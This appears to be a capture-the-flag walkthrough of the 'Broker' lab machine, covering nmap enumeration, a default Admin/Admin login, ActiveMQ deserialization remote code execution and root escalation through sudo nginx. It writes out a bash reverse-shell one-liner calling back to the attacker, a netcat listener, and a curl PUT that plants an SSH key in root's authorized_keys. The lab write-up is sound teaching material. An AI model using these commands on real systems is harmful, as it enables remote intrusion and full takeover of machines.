A Walkthrough of the Broker Machine
Enumeration
The IP address for the Broker machine during this walkthrough was 10.10.11.243
We can kick off our enumeration with an nmap scan.
nmap -sV -sC 10.10.11.243 -oN initial.nmap 
We can see two ports open on the machine.
- Port 22: This is ssh which means if we get credentials we may be able to login this way. This may be useful later
- Port 80: This is an HTTP server. This is likely our entry point so I will start here.
Navigating to the IP address in a browser presents us with a login prompt.
I attempted to login with default and common credentials. The credentials Admin Admin worked and allowed me to login.
We can get the server version here as well.
The ActiveMQ service runs on an uncommon port 61616. We can run a full port scan using nmap to view any other ports we may have missed with our quick scan.
nmap -sV -sC -p- 10.10.11.243 -oN fullPort.nmap
Here we can also see that the ActiveMQ version 5.15.15. With the version information we can search and see if there are any vulnerabilities associated with it.
Exploitation
Note: I wanted to make a quick note that I tried several exploits before I found one that worked. This is the path that worked for me.
This vulnerability allows for a threat actor to perform Remote Code Execution (RCE) by manipulating serialized class types.
Using the CVE we can find the exploit below on GitHub.
This exploit will cause the vulnerable server to reach to our attacking machine to fetch an XML file with a reverse shell in it. The Proof of Concept (PoC) provided uses msfvenom to generate a Linux elf payload. Instead of doing this I will use a basic bash reverse shell. To prevent a formatting issue I will base64 encode the payload.
echo "bash -i >& /dev/tcp/<YourIP>/<YourPort> 0>&1" | base64
Now we can put it into the XML file.
For the vulnerable server to download the xml file we need to host a HTTP server. I used python3 for convince but you could also use anything.
python3 -m http.server 8000
We also need to start a netcat (nc) listener to receive the reverse shell.
nc -nvlp 8080We can now run the script.
./ActiveMQ-RCE -i <VulnerableMachineIP> -u <URLtoTheXML> 
If we check the listener we should have a connection back.
Privilege Escalation
If we use the command sudo -l we can see that the current user has sudo permissions to run /usr/sbin/nginx. Since we can do this it may be possible to host a nginx server as root that can therefore read and write to the root directory.
I am not familiar with nginx configuration files but I was able to use a couple of different resources to put together a functioning configuration.
A couple of things to note. We are telling it to run as the root user hosting the server on 8081 in the / directory. Autoindex is on to allow us to view the file directory. The line dav_methods PUT; allows the PUT method to be used.
The idea here is we can view the root directory to confirm the vulnerability then we can attempt to PUT an ssh key into the root users .ssh folder.
Using the python3 simple HTTP server we can move the config file over to the target machine. I saved it to the /tmp directory. Now we can host the server and see if it works.
sudo /usr/sbin/nginx -c /tmp/web.confA curl request can be made to view the page contents.
This works and we are able to view the root.txt file.
One step further
If you agree that it is not over until we have a root shell then we can go one step further. Since we enable the PUT method we can generate an SSH key and drop it in the root users .ssh folder.
ssh-keygen
Curl can be used to upload the file.
curl -X PUT http://<TargetIP>/root/.ssh/authorized_keys -d '<Your SSH key>
Once the file has been uploaded we can attempt to ssh to the machine.
ssh -i <YourSSHKey> root@<TargetIP> 
We now have shell as root on the target box.
Thank you for joining me through this journey, I hope you had fun and learned something. Feel free to reach out to me if you have any questions. You can find me at the following links:
LinkedIn: https://www.linkedin.com/in/seth-mccoun-353669163
Twitter: https://twitter.com/seth_mccoun
